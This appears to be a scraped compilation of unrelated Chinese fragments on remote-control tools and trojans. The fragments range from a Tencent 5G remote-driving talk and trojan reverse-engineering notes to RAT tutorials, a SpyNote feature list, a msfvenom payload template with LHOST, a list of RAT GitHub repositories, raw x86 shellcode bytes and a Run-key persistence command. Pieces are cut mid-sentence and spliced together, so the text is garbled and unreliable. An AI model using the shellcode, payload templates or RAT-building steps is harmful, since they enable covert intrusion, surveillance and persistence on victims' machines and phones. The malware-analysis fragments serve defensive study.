本期我们邀请了腾讯云音视频专家工程师——白松灵,为大家分享5G远控技术创新探索以及腾讯云在超低延时传输上的技术实践。 5G是当前的新趋势。 传统4G满足不了的很多需要更大带宽、更低延时的需求,比如云游戏、VR/AR、4K/8K、全景直播等需要超大带宽的应用,在4G下无法实现,通过5G则可以满足;而远程手术、远程会议、远程会诊、自动驾驶等超低延时的应用场景 在矿山、冶金、港口以及开放道路等场景中,通过5G远控技术可以将实际操作的安全员从车上解放出来,实现真正的无人,甚至可以实现一名驾驶员控制多台车辆,解放更多人力成本。 未来我们将持续拓展更多的5G远程实时控制场景,让远控技术可以造福更多的行业。同时,我们也会持续致力于不断提升远控相关的性能与指标并探索更多的方式来增强远控的操控体验。
80 x64 services.exe 7 484 x64 lsass.exe 8
natpass:轻量级远程控制工具在今天的数字化时代,远程控制工具变得越来越重要,无论是用于远程技术支持、服务器管理还是其他远程操作。 广泛的用途:natpass可用于远程技术支持、服务器管理、远程开发、远程维护等各种用途,帮助用户更好地管理和控制计算机和服务器。 natpass的部署过程要使用natpass,您需要将其部署到服务器端、受控端和控制端。下面是针对debian系统的部署过程示例:服务器端部署在服务器上下载natpass,并将其解压到任意目录。 使用以下命令启动服务器端程序,使用sudo以管理员权限运行: sudo . (可选)修改local.yaml配置文件,将server地址设置为服务器端的地址。
这是一套令牌提权的组合拳,返回上一层;这里是拿到句柄复制句柄; 3.7.2、sub_4066C0这边就开始和服务通信sub_401470:sub_401660:这里有一个开辟线程,进入回调函数发现,是和服务器链接
Ares远控 前言 本文介绍一个比较有意思的基于Python的远程控制工具Ares。 Ares远控采用B/S架构,基于Python2,Server端使用Flask进行开发,整体在浏览器就可以轻易操作。 第二节 优势与不足 这个使用Python开发的B/S远控,整体来说实现一个远控的基本功能。 pyinstaller带包成二进制文件 使用http协议进行交互,防火墙不会拦截 不足: 使用py2开发,不兼容py3 并发性差 循环采用http询问,效率低下,容易被发现 http数据域没有被加密,保密性差 打算对这个远控进行重写
文章来源|MS08067 红队培训班 第5期 本文作者:thresh(红队培训班5期学员) 0x01 钉钉机器人远控 钉钉,阿里巴巴出品,专为全球企业组织打造的智能移动办公平台,含PC版,IPad和手机版 本次作业是使用钉钉机器人来实现远控服务器! 1、登录钉钉开放平台 可以先创建一个企业 选择应用开发,企业内部开发,添加一个机器人 记录生成的密钥 配置好开发管理,服务器出口IP添加VPS的地址,消息接收地址为一个可以接收数据的url,该url 验证不通过') print('有get请求') if __name__ == '__main__': app.run(host='0.0.0.0', port=9000) 3、在开发管理的服务器上启动服务 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run' --type DeleteValue --key 'shell' 0x04 总结 钉钉机器人的服务端远控
大灰狼远程控制木马是一个较为常见的远控工具,不同的木马病毒团伙对其定制改造后发布了诸多变种。本章将从启动过程、通信协议、远控功能三个方面逆向分析该木马的实现原理。 16.5 远控功能分析 远控功能分析如代码清单 16-5 所示。 cmp eax, 1 .text:1000E8A4 jz short loc_1000E8C0 ; 检查服务器是否启动状态 .text:1000E8A6 xor eax, eax .text:1000E8A8 服务器管理代码分析如代码清单 16-13 所示。 有了对大灰狼远控木马的分析,读者可以根据病毒的实现原理,编写对应的修复、防御工具,制作针对大灰狼远控木马的专杀软件。 本文摘编自《C++反汇编与逆向分析技术揭秘(第2版)》,经出版方授权发布。
目标IP:139.159.227.182,使用微步对该IP进行分析,发现该IP服务器存在病毒样本数据,详细如下: ? 确认该信息后,使用杀软对系统进行病毒查杀,但并未发现异常: ? 对此不太甘心,因此做了一下操作: 在防火墙封锁该IP,禁止与互联网进行通信; 进入系统对进程信息进行分析,判断是否存在问题; 对外联流量的对象系统进行渗透; 第二章、大灰狼远控木马分析 使用process 2.2、Main函数 加载121.exe文件后,发现main函数主要调用了sub_401ED8和sub_401DEC。 1、sub_401ED8主要作用为对URL地址进行解密; 2、sub_401DEC主要作用为载入程序。 详细如下: ? 2.3、sub_401ED8 sub_401ED8函数URL地址进行解密中主要调用了sub_4015AA与 sub_40163E,详细如下: ?
最近在某国外论坛上流出一款安卓远控spynote3.2版本,以前freebuf上有人发过spynots2.4版的,不过现在已经升级了,功能变得更加强大,危害更严重。 和以前的几个android远控相比(droidjack, android RAT, dendroid)相比,此次的更新亮点不多,只不过是对现在的安卓升级版本的跟进而已。 可以看到,和以往的远控一样,做好端口映射,定制图标,包名,版本号等等,还可以和别的apk文件捆绑,不过经测试好像有bug,并不能正常使用。生成带木马的apk文件,安装之后上线。 APK,绑定在被控手机的任何APP上 2、可在电脑端控制手机,包括浏览、传输、删除文件等 3、可进行SMS短信收发和查看功能 4、可以控制手机的电话功能 5、联系人管理 6、麦克风监听 7、GPS定位 8、
打开终端并输入以下命令:msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]
Boost 利用ASIO框架实现一个跨平台的反向远控程序,该远控支持保存套接字,当有套接字连入时,自动存储到map容器,当客户下线时自动从map容器中移除,当我们需要与特定客户端通信时,只需要指定客户端
上面都是共享 C&C 服务器的应用程序。 CypherRat 地下销售 该恶意软件家族的最新变种 SpyNote.C 在 Telegram 进行出售,且名为 CypherRat。 卓越的能力 SpyNote.C 恶意软件变种执行的独特功能,在 2022 年具有远控功能更的恶意软件中被识别出来。 收到攻击者的命令后,攻击者的 C&C 服务器会收到从网页获取的凭据和信息。 ;return;}if(passgmal.length() < 8) {cmd_receiver.showToast("Password Must At least 8 characters.") 2e1c68c3e785679c04d915eb2f960ef5e7ef3294a423e1835aa06e0254812c7a 4779c469c50d157d2140d39fc9b034c931b5224e886bcb60024687fe4022063e a2a95cfccb8fbe557f605b8a47dad901d3a25f8cdae7f0beee133f60b924c45a
Kage,一个把msf变成可视化远控平台的工具。 项目地址 https://github.com/WayzDev/Kage/ 下载安装 点我下载哈~ 下载后,给予运行权限。
你我相识,我们一同探索开源神器,如果喜欢小编,就赶紧关注我们, 让我们一起成长吧 部分图片 下面的图片展示了一部分远控的图片,里面包含了很多很多好玩有不错的事情。 ? ? ? ? 远控大集合列表 优秀神器大杂烩 https://github.com/quasar/QuasarRAT https://github.com/TheSph1nx/RT-101 https://github.com njRAT-v0.7d https://github.com/zerosum0x0/koadic 恶作剧型 https://github.com/NYAN-x-CAT/Lime-RAT 敲诈加密软件 手机远控 https://github.com/The404Hacking/AndroRAT 其他远控大集合 https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp https
具体思路如下: 1、TPYBoard v202作为整个小车的核心控制部分,连接L298N电机驱动模块,实现小车的基本方向控制; 2、TPYBoard v202接入网络,开启Socket服务实现web服务器功能 line == b'\r\n': break req += line print("Request:") req=req.decode('utf-8' %E6%99%BA%E8%83%BDWIFI%E8%BF%9C%E6%8E%A7%E5%B0%8F%E8%BD%A6>`_
PS:本文仅用于技术讨论与交流,严禁用于任何非法用途,违者后果自负 在学习攻击渗透的过程中,不免会接触远控工具。 现有的远控工具很多,从大名鼎鼎的冰河到CHAOS。 本文详细介绍了一款最小功能集的远控工具的实现细节,按照步骤动手实现,不仅可以对于远控工具的背后思路有了更深的体会,也可以巩固自己在多线程、网络编程等方面的知识。 一、总体结构 图1.总体结构 同一般的远控工具一致,我们要实现的这款工具也是包含服务端和客户端。 服务端运行在VPS主机上,监听443端口。 图8.将客户端打包成exe 四、效果演示 服务端运行时,当客户端上线时,会打印客户端的IP。
系统概述 该系统是一个基于TCP Socket的远程文件管理系统,支持客户端与服务器之间的文件管理操作。 系统分为客户端和服务器两部分,客户端可以运行在Android和Windows平台上,服务器则运行在Windows平台上。客户端通过Socket与服务器通信,实现文件浏览、下载等操作。 Windows客户端:通过ClientSocket类与服务器通信,处理文件管理相关的请求。 服务器: Socket服务器:监听客户端连接,处理客户端的请求并返回相应的文件信息。 核心技术点 Socket通信: 客户端与服务器通过TCP Socket进行通信,使用Socket类进行数据传输。 服务器通过HandleFileManager类处理客户端的文件管理请求,并将结果返回给客户端。
x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26 \x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\ x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f \x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\
来自 | FreeBuf PS:本文仅用于技术讨论与交流,严禁用于任何非法用途,违者后果自负 在学习攻击渗透的过程中,不免会接触远控工具。 现有的远控工具很多,从大名鼎鼎的冰河到CHAOS。 本文详细介绍了一款最小功能集的远控工具的实现细节,按照步骤动手实现,不仅可以对于远控工具的背后思路有了更深的体会,也可以巩固自己在多线程、网络编程等方面的知识。 一、总体结构 ? 图1.总体结构 同一般的远控工具一致,我们要实现的这款工具也是包含服务端和客户端。 服务端运行在VPS主机上,监听443端口。 由于我们的这款远控工具只是学习使用,所以不考虑绕过杀软的方法,使用写注册表的方式将自己设置为开机自启动: ?
ICMP后门 前言 这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了。 HTTP协议主要是用在以大型网站作为C&C服务器的场景,例如之前就有使用twitter作为 C&C服务器。 本次就以ICMP协议进行分析,并使用Python开发出一个ICMP远控后门,在写这篇文章的之前,我感觉大家对ICMP协议肯定不会很了解,因此将ICMP后门的实现分成几篇进行讲解,循序渐进。 如下图所示,ICMP协议是典型的一问一答模式,本机向百度服务器发送ICMP请求包,如果请求包成功到达目的地,百度服务器则回应ICMP响应包。 ? 对于ICMP首部细分为8位类型+8位代码+16位校验和+16位标识符+16位序列号,其中类型的取值如下,我们比较关注的是请求(取值为8)和应答(取值为0)。 ?